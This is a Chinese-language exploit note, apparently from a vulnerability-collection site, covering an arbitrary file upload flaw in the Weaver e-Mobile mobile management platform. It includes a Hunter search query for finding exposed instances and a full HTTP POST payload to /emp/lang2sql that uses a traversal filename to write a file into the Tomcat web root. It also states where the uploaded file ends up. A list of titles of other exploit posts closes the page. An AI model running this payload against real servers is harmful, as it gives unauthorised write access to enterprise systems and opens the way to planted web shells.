F5-4泛微-E-Mobile移动管理平台-文件上传

漏洞描述：

泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具，使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞。

网站图片:

网络测绘:

Hunter 语法:

hunterapp.name=“泛微 e-Mobile 移动管理平台”
漏洞复现:
当访问/emp/lang2sql出现如下页面表示可能存在漏洞

payload：

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Upgrade-Insecure-Requests: 1
SL-CE-SUID: 15
Content-Type: multipart/form-data; boundary=00content0boundary00
Content-Length: 235

–00content0boundary00
Content-Disposition: form-data; name=“source”

–00content0boundary00
Content-Disposition: form-data; name=“file”; filename=“././appsvr/tomcat/webapps/ROOT/x.txt”

test
–00content0boundary00–

效果图:

上传文件位置，根目录
/x.txt

Menu

Share

F5-4泛微-E-Mobile移动管理平台-文件上传

F5-4泛微-E-Mobile移动管理平台-文件上传

漏洞描述：

网站图片:

网络测绘:

Hunter 语法:

漏洞复现:

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

用友U8Cloud-RepAddToTaskAction-SQL注入

蓝凌OAsysUiComponent未授权复制

Q14-1群杰-印章物联网管理平台-PermissionAC

Y4-21用友-NC-XXE

泛微ecology-v9-ModeDateService-SQL注入